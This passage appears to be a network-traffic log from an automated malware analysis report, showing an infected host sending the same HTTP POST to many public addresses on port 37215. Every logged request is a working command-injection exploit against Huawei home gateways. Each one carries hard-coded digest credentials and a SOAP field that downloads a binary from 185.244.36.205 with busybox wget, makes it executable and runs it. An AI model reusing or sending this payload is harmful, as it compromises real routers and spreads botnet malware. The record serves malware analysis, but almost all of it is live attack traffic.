                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              901192.168.2.1551652121.175.21.6637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539062977 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              902192.168.2.1554878181.243.77.18237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539076090 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              903192.168.2.154713045.150.8.21637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539109945 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              904192.168.2.153554437.127.119.1037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539127111 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              905192.168.2.154023898.46.152.13637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539144993 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              906192.168.2.1533836222.64.24.24537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539180040 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              907192.168.2.1557130186.10.186.12937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539180994 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              908192.168.2.1549422181.89.38.25037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539208889 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              909192.168.2.1538842181.199.219.5437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539211988 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              910192.168.2.153307637.62.134.5037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539225101 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              911192.168.2.155762441.1.236.1337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539232969 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
